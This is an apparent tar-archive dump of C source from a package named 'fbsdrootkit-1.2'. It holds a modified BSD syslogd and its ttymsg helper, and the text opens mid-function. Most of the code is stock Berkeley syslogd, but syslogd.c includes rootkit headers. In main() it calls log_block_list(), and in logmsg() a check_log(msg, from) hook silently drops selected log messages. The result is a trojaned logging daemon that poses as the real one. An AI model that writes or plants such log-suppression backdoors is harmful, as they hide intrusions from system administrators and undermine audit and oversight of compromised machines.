omask = sigblock(sigmask(SIGHUP)|sigmask(SIGALRM)); /* * Check to see if msg looks non-standard. */ msglen = strlen(msg); if (msglen < 16 || msg[3] != ' ' || msg[6] != ' ' || msg[9] != ':' || msg[12] != ':' || msg[15] != ' ') flags |= ADDDATE; (void)time(&now); if (flags & ADDDATE) timestamp = ctime(&now) + 4; else { timestamp = msg; msg += 16; msglen -= 16; } /* skip leading blanks */ while(isspace(*msg)) { msg++; msglen--; } /* extract facility and priority level */ if (flags & MARK) fac = LOG_NFACILITIES; else fac = LOG_FAC(pri); prilev = LOG_PRI(pri); /* extract program name */ for(i = 0; i < NAME_MAX; i++) { if(!isalnum(msg[i])) break; prog[i] = msg[i]; } prog[i] = 0; /* log the message to the particular outputs */ if (!Initialized) { f = &consfile; f->f_file = open(ctty, O_WRONLY, 0); if (f->f_file >= 0) { fprintlog(f, flags, msg); (void)close(f->f_file); } (void)sigsetmask(omask); return; } for (f = Files; f; f = f->f_next) { /* skip messages that are incorrect priority */ if (f->f_pmask[fac] < prilev || f->f_pmask[fac] == INTERNAL_NOPRI) continue; /* skip messages with the incorrect program name */ if(f->f_program) if(strcmp(prog, f->f_program) != 0) continue; if (f->f_type == F_CONSOLE && (flags & IGN_CONS)) continue; /* don't output marks to recently written files */ if ((flags & MARK) && (now - f->f_time) < MarkInterval / 2) continue; /* * suppress duplicate lines to this file */ if ((flags & MARK) == 0 && msglen == f->f_prevlen && !strcmp(msg, f->f_prevline) && !strcmp(from, f->f_prevhost)) { (void)strncpy(f->f_lasttime, timestamp, 15); f->f_prevcount++; dprintf("msg repeated %d times, %ld sec of %d\n", f->f_prevcount, now - f->f_time, repeatinterval[f->f_repeatcount]); /* * If domark would have logged this by now, * flush it now (so we don't hold isolated messages), * but back off so we'll flush less often * in the future. */ if (now > REPEATTIME(f)) { fprintlog(f, flags, (char *)NULL); BACKOFF(f); } } else { /* new line, save it */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); f->f_repeatcount = 0; (void)strncpy(f->f_lasttime, timestamp, 15); (void)strncpy(f->f_prevhost, from, sizeof(f->f_prevhost)); if (msglen < MAXSVLINE) { f->f_prevlen = msglen; f->f_prevpri = pri; (void)strcpy(f->f_prevline, msg); fprintlog(f, flags, (char *)NULL); } else { f->f_prevline[0] = 0; f->f_prevlen = 0; fprintlog(f, flags, msg); } } } (void)sigsetmask(omask); } void fprintlog(f, flags, msg) struct filed *f; int flags; char *msg; { struct iovec iov[6]; struct iovec *v; int l; char line[MAXLINE + 1], repbuf[80], greetings[200]; v = iov; if (f->f_type == F_WALL) { v->iov_base = greetings; v->iov_len = sprintf(greetings, "\r\n\7Message from syslogd@%s at %.24s ...\r\n", f->f_prevhost, ctime(&now)); v++; v->iov_base = ""; v->iov_len = 0; v++; } else { v->iov_base = f->f_lasttime; v->iov_len = 15; v++; v->iov_base = " "; v->iov_len = 1; v++; } v->iov_base = f->f_prevhost; v->iov_len = strlen(v->iov_base); v++; v->iov_base = " "; v->iov_len = 1; v++; if (msg) { v->iov_base = msg; v->iov_len = strlen(msg); } else if (f->f_prevcount > 1) { v->iov_base = repbuf; v->iov_len = sprintf(repbuf, "last message repeated %d times", f->f_prevcount); } else { v->iov_base = f->f_prevline; v->iov_len = f->f_prevlen; } v++; dprintf("Logging to %s", TypeNames[f->f_type]); f->f_time = now; switch (f->f_type) { case F_UNUSED: dprintf("\n"); break; case F_FORW: dprintf(" %s\n", f->f_un.f_forw.f_hname); l = sprintf(line, "<%d>%.15s %s", f->f_prevpri, iov[0].iov_base, iov[4].iov_base); if (l > MAXLINE) l = MAXLINE; if (sendto(finet, line, l, 0, (struct sockaddr *)&f->f_un.f_forw.f_addr, sizeof(f->f_un.f_forw.f_addr)) != l) { int e = errno; (void)close(f->f_file); f->f_type = F_UNUSED; errno = e; logerror("sendto"); } break; case F_CONSOLE: if (flags & IGN_CONS) { dprintf(" (ignored)\n"); break; } /* FALLTHROUGH */ case F_TTY: case F_FILE: dprintf(" %s\n", f->f_un.f_fname); if (f->f_type != F_FILE) { v->iov_base = "\r\n"; v->iov_len = 2; } else { v->iov_base = "\n"; v->iov_len = 1; } again: if (writev(f->f_file, iov, 6) < 0) { int e = errno; (void)close(f->f_file); /* * Check for errors on TTY's due to loss of tty */ if ((e == EIO || e == EBADF) && f->f_type != F_FILE) { f->f_file = open(f->f_un.f_fname, O_WRONLY|O_APPEND, 0); if (f->f_file < 0) { f->f_type = F_UNUSED; logerror(f->f_un.f_fname); } else goto again; } else { f->f_type = F_UNUSED; errno = e; logerror(f->f_un.f_fname); } } else if (flags & SYNC_FILE) (void)fsync(f->f_file); break; case F_USERS: case F_WALL: dprintf("\n"); v->iov_base = "\r\n"; v->iov_len = 2; wallmsg(f, iov); break; } f->f_prevcount = 0; } /* * WALLMSG -- Write a message to the world at large * * Write the specified message to either the entire * world, or a list of approved users. */ void wallmsg(f, iov) struct filed *f; struct iovec *iov; { static int reenter; /* avoid calling ourselves */ FILE *uf; struct utmp ut; int i; char *p; char line[sizeof(ut.ut_line) + 1]; if (reenter++) return; if ((uf = fopen(_PATH_UTMP, "r")) == NULL) { logerror(_PATH_UTMP); reenter = 0; return; } /* NOSTRICT */ while (fread((char *)&ut, sizeof(ut), 1, uf) == 1) { if (ut.ut_name[0] == '\0') continue; strncpy(line, ut.ut_line, sizeof(ut.ut_line)); line[sizeof(ut.ut_line)] = '\0'; if (f->f_type == F_WALL) { if ((p = ttymsg(iov, 6, line, 60*5)) != NULL) { errno = 0; /* already in msg */ logerror(p); } continue; } /* should we send the message to this user? */ for (i = 0; i < MAXUNAMES; i++) { if (!f->f_un.f_uname[i][0]) break; if (!strncmp(f->f_un.f_uname[i], ut.ut_name, UT_NAMESIZE)) { if ((p = ttymsg(iov, 6, line, 60*5)) != NULL) { errno = 0; /* already in msg */ logerror(p); } break; } } } (void)fclose(uf); reenter = 0; } void reapchild(signo) int signo; { union wait status; while (wait3((int *)&status, WNOHANG, (struct rusage *)NULL) > 0) ; } /* * Return a printable representation of a host address. */ char * cvthname(f) struct sockaddr_in *f; { struct hostent *hp; char *p; dprintf("cvthname(%s)\n", inet_ntoa(f->sin_addr)); if (f->sin_family != AF_INET) { dprintf("Malformed from address\n"); return ("???"); } hp = gethostbyaddr((char *)&f->sin_addr, sizeof(struct in_addr), f->sin_family); if (hp == 0) { dprintf("Host name for your address (%s) unknown\n", inet_ntoa(f->sin_addr)); return (inet_ntoa(f->sin_addr)); } if ((p = strchr(hp->h_name, '.')) && strcmp(p + 1, LocalDomain) == 0) *p = '\0'; return (hp->h_name); } void domark(signo) int signo; { struct filed *f; now = time((time_t *)NULL); MarkSeq += TIMERINTVL; if (MarkSeq >= MarkInterval) { logmsg(LOG_INFO, "-- MARK --", LocalHostName, ADDDATE|MARK); MarkSeq = 0; } for (f = Files; f; f = f->f_next) { if (f->f_prevcount && now >= REPEATTIME(f)) { dprintf("flush %s: repeated %d times, %d sec.\n", TypeNames[f->f_type], f->f_prevcount, repeatinterval[f->f_repeatcount]); fprintlog(f, 0, (char *)NULL); BACKOFF(f); } } (void)alarm(TIMERINTVL); } /* * Print syslogd errors some place. */ void logerror(type) char *type; { char buf[100]; if (errno) (void)snprintf(buf, sizeof(buf), "syslogd: %s: %s", type, strerror(errno)); else (void)snprintf(buf, sizeof(buf), "syslogd: %s", type); errno = 0; dprintf("%s\n", buf); logmsg(LOG_SYSLOG|LOG_ERR, buf, LocalHostName, ADDDATE); } void die(signo) int signo; { struct filed *f; char buf[100]; for (f = Files; f != NULL; f = f->f_next) { /* flush any pending output */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); } if (signo) { dprintf("syslogd: exiting on signal %d\n", signo); (void)sprintf(buf, "exiting on signal %d", signo); errno = 0; logerror(buf); } (void)unlink(LogName); exit(0); } /* * INIT -- Initialize syslogd from configuration table */ void init(signo) int signo; { int i; FILE *cf; struct filed *f, *next, **nextp; char *p; char cline[LINE_MAX]; char prog[NAME_MAX+1]; dprintf("init\n"); /* * Close all open log files. */ Initialized = 0; for (f = Files; f != NULL; f = next) { /* flush any pending output */ if (f->f_prevcount) fprintlog(f, 0, (char *)NULL); switch (f->f_type) { case F_FILE: case F_TTY: case F_CONSOLE: case F_FORW: (void)close(f->f_file); break; } next = f->f_next; if(f->f_program) free(f->f_program); free((char *)f); } Files = NULL; nextp = &Files; /* open the configuration file */ if ((cf = fopen(ConfFile, "r")) == NULL) { dprintf("cannot open %s\n", ConfFile); *nextp = (struct filed *)calloc(1, sizeof(*f)); cfline("*.ERR\t/dev/console", *nextp, "*"); (*nextp)->f_next = (struct filed *)calloc(1, sizeof(*f)); cfline("*.PANIC\t*", (*nextp)->f_next, "*"); Initialized = 1; return; } /* * Foreach line in the conf table, open that file. */ f = NULL; strcpy(prog, "*"); while (fgets(cline, sizeof(cline), cf) != NULL) { /* * check for end-of-section, comments, strip off trailing * spaces and newline character. #!prog is treated specially: * following lines apply only to that program. */ for (p = cline; isspace(*p); ++p) continue; if (*p == 0) continue; if(*p == '#') { p++; if(*p!='!') continue; } if(*p=='!') { p++; while(isspace(*p)) p++; if(!*p) { strcpy(prog, "*"); continue; } for(i = 0; i < NAME_MAX; i++) { if(!isalnum(p[i])) break; prog[i] = p[i]; } prog[i] = 0; continue; } for (p = strchr(cline, '\0'); isspace(*--p);) continue; *++p = '\0'; f = (struct filed *)calloc(1, sizeof(*f)); *nextp = f; nextp = &f->f_next; cfline(cline, f, prog); } /* close the configuration file */ (void)fclose(cf); Initialized = 1; if (Debug) { for (f = Files; f; f = f->f_next) { for (i = 0; i <= LOG_NFACILITIES; i++) if (f->f_pmask[i] == INTERNAL_NOPRI) printf("X "); else printf("%d ", f->f_pmask[i]); printf("%s: ", TypeNames[f->f_type]); switch (f->f_type) { case F_FILE: case F_TTY: case F_CONSOLE: printf("%s", f->f_un.f_fname); break; case F_FORW: printf("%s", f->f_un.f_forw.f_hname); break; case F_USERS: for (i = 0; i < MAXUNAMES && *f->f_un.f_uname[i]; i++) printf("%s, ", f->f_un.f_uname[i]); break; } if(f->f_program) { printf(" (%s)", f->f_program); } printf("\n"); } } logmsg(LOG_SYSLOG|LOG_INFO, "syslogd: restart", LocalHostName, ADDDATE); dprintf("syslogd: restarted\n"); } /* * Crack a configuration file line */ void cfline(line, f, prog) char *line; struct filed *f; char *prog; { struct hostent *hp; int i, pri; char *bp, *p, *q; char buf[MAXLINE], ebuf[100]; dprintf("cfline(\"%s\", f, \"%s\")\n", line, prog); errno = 0; /* keep strerror() stuff out of logerror messages */ /* clear out file entry */ memset(f, 0, sizeof(*f)); for (i = 0; i <= LOG_NFACILITIES; i++) f->f_pmask[i] = INTERNAL_NOPRI; /* save program name if any */ if(prog && *prog=='*') prog = NULL; if(prog) { f->f_program = calloc(1, strlen(prog)+1); if(f->f_program) { strcpy(f->f_program, prog); } } /* scan through the list of selectors */ for (p = line; *p && *p != '\t';) { /* find the end of this facility name list */ for (q = p; *q && *q != '\t' && *q++ != '.'; ) continue; /* collect priority name */ for (bp = buf; *q && !strchr("\t,;", *q); ) *bp++ = *q++; *bp = '\0'; /* skip cruft */ while (strchr(", ;", *q)) q++; /* decode priority name */ if (*buf == '*') pri = LOG_PRIMASK + 1; else { pri = decode(buf, prioritynames); if (pri < 0) { (void)sprintf(ebuf, "unknown priority name \"%s\"", buf); logerror(ebuf); return; } } /* scan facilities */ while (*p && !strchr("\t.;", *p)) { for (bp = buf; *p && !strchr("\t,;.", *p); ) *bp++ = *p++; *bp = '\0'; if (*buf == '*') for (i = 0; i < LOG_NFACILITIES; i++) f->f_pmask[i] = pri; else { i = decode(buf, facilitynames); if (i < 0) { (void)sprintf(ebuf, "unknown facility name \"%s\"", buf); logerror(ebuf); return; } f->f_pmask[i >> 3] = pri; } while (*p == ',' || *p == ' ') p++; } p = q; } /* skip to action part */ while (*p == '\t') p++; switch (*p) { case '@': if (!InetInuse) break; (void)strcpy(f->f_un.f_forw.f_hname, ++p); hp = gethostbyname(p); if (hp == NULL) { extern int h_errno; logerror(hstrerror(h_errno)); break; } memset(&f->f_un.f_forw.f_addr, 0, sizeof(f->f_un.f_forw.f_addr)); f->f_un.f_forw.f_addr.sin_family = AF_INET; f->f_un.f_forw.f_addr.sin_port = LogPort; memmove(&f->f_un.f_forw.f_addr.sin_addr, hp->h_addr, hp->h_length); f->f_type = F_FORW; break; case '/': (void)strcpy(f->f_un.f_fname, p); if ((f->f_file = open(p, O_WRONLY|O_APPEND, 0)) < 0) { f->f_file = F_UNUSED; logerror(p); break; } if (isatty(f->f_file)) f->f_type = F_TTY; else f->f_type = F_FILE; if (strcmp(p, ctty) == 0) f->f_type = F_CONSOLE; break; case '*': f->f_type = F_WALL; break; default: for (i = 0; i < MAXUNAMES && *p; i++) { for (q = p; *q && *q != ','; ) q++; (void)strncpy(f->f_un.f_uname[i], p, UT_NAMESIZE); if ((q - p) > UT_NAMESIZE) f->f_un.f_uname[i][UT_NAMESIZE] = '\0'; else f->f_un.f_uname[i][q - p] = '\0'; while (*q == ',' || *q == ' ') q++; p = q; } f->f_type = F_USERS; break; } } /* * Decode a symbolic name to a numeric value */ int decode(name, codetab) const char *name; CODE *codetab; { CODE *c; char *p, buf[40]; if (isdigit(*name)) return (atoi(name)); for (p = buf; *name && p < &buf[sizeof(buf) - 1]; p++, name++) { if (isupper(*name)) *p = tolower(*name); else *p = *name; } *p = '\0'; for (c = codetab; c->c_name; c++) if (!strcmp(buf, c->c_name)) return (c->c_val); return (-1); } fbsdrootkit-1.2/syslogd/ttymsg.c100664 764 0 11510 6256606427 14670 0ustar dfroot/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)ttymsg.c 8.2 (Berkeley) 11/16/93"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include /* * Display the contents of a uio structure on a terminal. Used by wall(1), * syslogd(8), and talkd(8). Forks and finishes in child if write would block, * waiting up to tmout seconds. Returns pointer to error string on unexpected * error; string is not newline-terminated. Various "normal" errors are * ignored (exclusive-use, lack of permission, etc.). */ char * ttymsg(iov, iovcnt, line, tmout) struct iovec *iov; int iovcnt; char *line; int tmout; { static char device[MAXNAMLEN] = _PATH_DEV; static char errbuf[1024]; register int cnt, fd, left, wret; struct iovec localiov[6]; int forked = 0; if (iovcnt > sizeof(localiov) / sizeof(localiov[0])) return ("too many iov's (change code in wall/ttymsg.c)"); (void) strcpy(device + sizeof(_PATH_DEV) - 1, line); if (strchr(device + sizeof(_PATH_DEV) - 1, '/')) { /* A slash is an attempt to break security... */ (void) snprintf(errbuf, sizeof(errbuf), "'/' in \"%s\"", device); return (errbuf); } /* * open will fail on slip lines or exclusive-use lines * if not running as root; not an error. */ if ((fd = open(device, O_WRONLY|O_NONBLOCK, 0)) < 0) { if (errno == EBUSY || errno == EACCES) return (NULL); (void) snprintf(errbuf, sizeof(errbuf), "%s: %s", device, strerror(errno)); return (errbuf); } for (cnt = left = 0; cnt < iovcnt; ++cnt) left += iov[cnt].iov_len; for (;;) { wret = writev(fd, iov, iovcnt); if (wret >= left) break; if (wret >= 0) { left -= wret; if (iov != localiov) { bcopy(iov, localiov, iovcnt * sizeof(struct iovec)); iov = localiov; } for (cnt = 0; wret >= iov->iov_len; ++cnt) { wret -= iov->iov_len; ++iov; --iovcnt; } if (wret) { iov->iov_base += wret; iov->iov_len -= wret; } continue; } if (errno == EWOULDBLOCK) { int cpid, off = 0; if (forked) { (void) close(fd); _exit(1); } cpid = fork(); if (cpid < 0) { (void) snprintf(errbuf, sizeof(errbuf), "fork: %s", strerror(errno)); (void) close(fd); return (errbuf); } if (cpid) { /* parent */ (void) close(fd); return (NULL); } forked++; /* wait at most tmout seconds */ (void) signal(SIGALRM, SIG_DFL); (void) signal(SIGTERM, SIG_DFL); /* XXX */ (void) sigsetmask(0); (void) alarm((u_int)tmout); (void) fcntl(fd, O_NONBLOCK, &off); continue; } /* * We get ENODEV on a slip line if we're running as root, * and EIO if the line just went away. */ if (errno == ENODEV || errno == EIO) break; (void) close(fd); if (forked) _exit(1); (void) snprintf(errbuf, sizeof(errbuf), "%s: %s", device, strerror(errno)); return (errbuf); } (void) close(fd); if (forked) _exit(0); return (NULL); } fbsdrootkit-1.2/syslogd/syslogd.c100600 764 764 66155 6256133351 14510 0ustar dfdf/* * Copyright (c) 1983, 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)syslogd.c 8.3 (Berkeley) 4/4/94"; #endif /* not lint */ /* * syslogd -- log system messages * * This program implements a system log. It takes a series of lines. * Each line may have a priority, signified as "" as * the first characters of the line. If this is * not present, a default priority is used. * * To kill syslogd, send a signal 15 (terminate). A signal 1 (hup) will * cause it to reread its configuration file. * * Defined Constants: * * MAXLINE -- the maximimum line length that can be handled. * DEFUPRI -- the default priority for user messages * DEFSPRI -- the default priority for kernel messages * * Author: Eric Allman * extensive changes by Ralph Campbell * more extensive changes by Eric Allman (again) * Extension to log by program name as well as facility and priority * by Peter da Silva. */ #define MAXLINE 1024 /* maximum line length */ #define MAXSVLINE 120 /* maximum saved line length */ #define DEFUPRI (LOG_USER|LOG_NOTICE) #define DEFSPRI (LOG_KERN|LOG_CRIT) #define TIMERINTVL 30 /* interval for checking flush, mark */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" /* Rootkit configuration files */ #include "../config.h" #include "../rootkitsyslogd.h" #define SYSLOG_NAMES #include char *LogName = _PATH_LOG; char *ConfFile = _PATH_LOGCONF; char *PidFile = _PATH_LOGPID; char ctty[] = _PATH_CONSOLE; #define FDMASK(fd) (1 << (fd)) #define dprintf if (Debug) printf #define MAXUNAMES 20 /* maximum number of user names */ /* * Flags to logmsg(). */ #define IGN_CONS 0x001 /* don't print on console */ #define SYNC_FILE 0x002 /* do fsync on file after printing */ #define ADDDATE 0x004 /* add a date to the message */ #define MARK 0x008 /* this message is a mark */ /* * This structure represents the files that will have log * copies printed. */ struct filed { struct filed *f_next; /* next in linked list */ short f_type; /* entry type, see below */ short f_file; /* file descriptor */ time_t f_time; /* time this was last written */ u_char f_pmask[LOG_NFACILITIES+1]; /* priority mask */ char *f_program; /* program this applies to */ union { char f_uname[MAXUNAMES][UT_NAMESIZE+1]; struct { char f_hname[MAXHOSTNAMELEN+1]; struct sockaddr_in f_addr; } f_forw; /* forwarding address */ char f_fname[MAXPATHLEN]; } f_un; char f_prevline[MAXSVLINE]; /* last message logged */ char f_lasttime[16]; /* time of last occurrence */ char f_prevhost[MAXHOSTNAMELEN+1]; /* host from which recd. */ int f_prevpri; /* pri of f_prevline */ int f_prevlen; /* length of f_prevline */ int f_prevcount; /* repetition cnt of prevline */ int f_repeatcount; /* number of "repeated" msgs */ }; /* * Intervals at which we flush out "message repeated" messages, * in seconds after previous message is logged. After each flush, * we move to the next interval until we reach the largest. */ int repeatinterval[] = { 30, 120, 600 }; /* # of secs before flush */ #define MAXREPEAT ((sizeof(repeatinterval) / sizeof(repeatinterval[0])) - 1) #define REPEATTIME(f) ((f)->f_time + repeatinterval[(f)->f_repeatcount]) #define BACKOFF(f) { if (++(f)->f_repeatcount > MAXREPEAT) \ (f)->f_repeatcount = MAXREPEAT; \ } /* values for f_type */ #define F_UNUSED 0 /* unused entry */ #define F_FILE 1 /* regular file */ #define F_TTY 2 /* terminal */ #define F_CONSOLE 3 /* console terminal */ #define F_FORW 4 /* remote machine */ #define F_USERS 5 /* list of users */ #define F_WALL 6 /* everyone logged on */ char *TypeNames[7] = { "UNUSED", "FILE", "TTY", "CONSOLE", "FORW", "USERS", "WALL" }; struct filed *Files; struct filed consfile; int Debug; /* debug flag */ char LocalHostName[MAXHOSTNAMELEN+1]; /* our hostname */ char *LocalDomain; /* our local domain name */ int InetInuse = 0; /* non-zero if INET sockets are being used */ int finet; /* Internet datagram socket */ int LogPort; /* port number for INET connections */ int Initialized = 0; /* set when we have initialized ourselves */ int MarkInterval = 20 * 60; /* interval between marks in seconds */ int MarkSeq = 0; /* mark sequence number */ void cfline __P((char *, struct filed *, char *)); char *cvthname __P((struct sockaddr_in *)); int decode __P((const char *, CODE *)); void die __P((int)); void domark __P((int)); void fprintlog __P((struct filed *, int, char *)); void init __P((int)); void logerror __P((char *)); void logmsg __P((int, char *, char *, int)); void printline __P((char *, char *)); void printsys __P((char *)); void reapchild __P((int)); char *ttymsg __P((struct iovec *, int, char *, int)); void usage __P((void)); void wallmsg __P((struct filed *, struct iovec *)); int main(argc, argv) int argc; char *argv[]; { int ch, funix, i, inetm, fklog, klogm, len; struct sockaddr_un sunx, fromunix; struct sockaddr_in sin, frominet; FILE *fp; char *p, line[MSG_BSIZE + 1]; while ((ch = getopt(argc, argv, "df:m:p:")) != EOF) switch(ch) { case 'd': /* debug */ Debug++; break; case 'f': /* configuration file */ ConfFile = optarg; break; case 'm': /* mark interval */ MarkInterval = atoi(optarg) * 60; break; case 'p': /* path */ LogName = optarg; break; case '?': default: usage(); } if ((argc -= optind) != 0) usage(); if (!Debug) (void)daemon(0, 0); else setlinebuf(stdout); log_block_list(); consfile.f_type = F_CONSOLE; (void)strcpy(consfile.f_un.f_fname, ctty); (void)gethostname(LocalHostName, sizeof(LocalHostName)); if ((p = strchr(LocalHostName, '.')) != NULL) { *p++ = '\0'; LocalDomain = p; } else LocalDomain = ""; (void)signal(SIGTERM, die); (void)signal(SIGINT, Debug ? die : SIG_IGN); (void)signal(SIGQUIT, Debug ? die : SIG_IGN); (void)signal(SIGCHLD, reapchild); (void)signal(SIGALRM, domark); (void)alarm(TIMERINTVL); (void)unlink(LogName); #ifndef SUN_LEN #define SUN_LEN(unp) (strlen((unp)->sun_path) + 2) #endif memset(&sunx, 0, sizeof(sunx)); sunx.sun_family = AF_UNIX; (void)strncpy(sunx.sun_path, LogName, sizeof(sunx.sun_path)); funix = socket(AF_UNIX, SOCK_DGRAM, 0); if (funix < 0 || bind(funix, (struct sockaddr *)&sunx, SUN_LEN(&sunx)) < 0 || chmod(LogName, 0666) < 0) { (void) sprintf(line, "cannot create %s", LogName); logerror(line); dprintf("cannot create %s (%d)\n", LogName, errno); die(0); } finet = socket(AF_INET, SOCK_DGRAM, 0); inetm = 0; if (finet >= 0) { struct servent *sp; sp = getservbyname("syslog", "udp"); if (sp == NULL) { errno = 0; logerror("syslog/udp: unknown service"); die(0); } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = LogPort = sp->s_port; if (bind(finet, (struct sockaddr *)&sin, sizeof(sin)) < 0) { logerror("bind"); if (!Debug) die(0); } else { inetm = FDMASK(finet); InetInuse = 1; } } if ((fklog = open(_PATH_KLOG, O_RDONLY, 0)) >= 0) klogm = FDMASK(fklog); else { dprintf("can't open %s (%d)\n", _PATH_KLOG, errno); klogm = 0; } /* tuck my process id away */ fp = fopen(PidFile, "w"); if (fp != NULL) { fprintf(fp, "%d\n", getpid()); (void) fclose(fp); } dprintf("off & running....\n"); init(0); (void)signal(SIGHUP, init); for (;;) { int nfds, readfds = FDMASK(funix) | inetm | klogm; dprintf("readfds = %#x\n", readfds); nfds = select(20, (fd_set *)&readfds, (fd_set *)NULL, (fd_set *)NULL, (struct timeval *)NULL); if (nfds == 0) continue; if (nfds < 0) { if (errno != EINTR) logerror("select"); continue; } dprintf("got a message (%d, %#x)\n", nfds, readfds); if (readfds & klogm) { i = read(fklog, line, sizeof(line) - 1); if (i > 0) { line[i] = '\0'; printsys(line); } else if (i < 0 && errno != EINTR) { logerror("klog"); fklog = -1; klogm = 0; } } if (readfds & FDMASK(funix)) { len = sizeof(fromunix); i = recvfrom(funix, line, MAXLINE, 0, (struct sockaddr *)&fromunix, &len); if (i > 0) { line[i] = '\0'; printline(LocalHostName, line); } else if (i < 0 && errno != EINTR) logerror("recvfrom unix"); } if (readfds & inetm) { len = sizeof(frominet); i = recvfrom(finet, line, MAXLINE, 0, (struct sockaddr *)&frominet, &len); if (i > 0) { line[i] = '\0'; printline(cvthname(&frominet), line); } else if (i < 0 && errno != EINTR) logerror("recvfrom inet"); } } } void usage() { (void)fprintf(stderr, "usage: syslogd [-f conffile] [-m markinterval] [-p logpath]\n"); exit(1); } /* * Take a raw input line, decode the message, and print the message * on the appropriate log files. */ void printline(hname, msg) char *hname; char *msg; { int c, pri; char *p, *q, line[MAXLINE + 1]; /* test for special codes */ pri = DEFUPRI; p = msg; if (*p == '<') { pri = 0; while (isdigit(*++p)) pri = 10 * pri + (*p - '0'); if (*p == '>') ++p; } if (pri &~ (LOG_FACMASK|LOG_PRIMASK)) pri = DEFUPRI; /* don't allow users to log kernel messages */ if (LOG_FAC(pri) == LOG_KERN) pri = LOG_MAKEPRI(LOG_USER, LOG_PRI(pri)); q = line; while ((c = *p++ & 0177) != '\0' && q < &line[sizeof(line) - 1]) if (iscntrl(c)) if (c == '\n') *q++ = ' '; else if (c == '\t') *q++ = '\t'; else { *q++ = '^'; *q++ = c ^ 0100; } else *q++ = c; *q = '\0'; logmsg(pri, line, hname, 0); } /* * Take a raw input line from /dev/klog, split and format similar to syslog(). */ void printsys(msg) char *msg; { int c, pri, flags; char *lp, *p, *q, line[MAXLINE + 1]; (void)strcpy(line, getbootfile()); (void)strcat(line, ": "); lp = line + strlen(line); for (p = msg; *p != '\0'; ) { flags = SYNC_FILE | ADDDATE; /* fsync file after write */ pri = DEFSPRI; if (*p == '<') { pri = 0; while (isdigit(*++p)) pri = 10 * pri + (*p - '0'); if (*p == '>') ++p; } else { /* kernel printf's come out on console */ flags |= IGN_CONS; } if (pri &~ (LOG_FACMASK|LOG_PRIMASK)) pri = DEFSPRI; q = lp; while (*p != '\0' && (c = *p++) != '\n' && q < &line[MAXLINE]) *q++ = c; *q = '\0'; logmsg(pri, line, LocalHostName, flags); } } time_t now; /* * Log a message to the appropriate log files, users, etc. based on * the priority. */ void logmsg(pri, msg, from, flags) int pri; char *msg, *from; int flags; { struct filed *f; int fac, msglen, omask, prilev; char *timestamp; char prog[NAME_MAX+1]; int i; if(check_log(msg,from)) return; dprintf("logmsg: pri %o, flags %x, from %s, msg %s\n", pri, flags, from, msg); omask = sigblock(sigmask(SIGHUP)|sigmask(SIGALRM)); /* * Check to see if msg looks non-standard. */ msglen = strlen(msg); if (msglen < 16 || msg[3] != ' ' || msg[6] != ' ' || msg[9] != ':' || msg[12] != ':' || msg[15] != ' ') flags |= ADDDATE; (void)time(&now); if (flags & ADDDATE) timestamp = ctime(&now) + 4; else { timestamp = msg; msg += 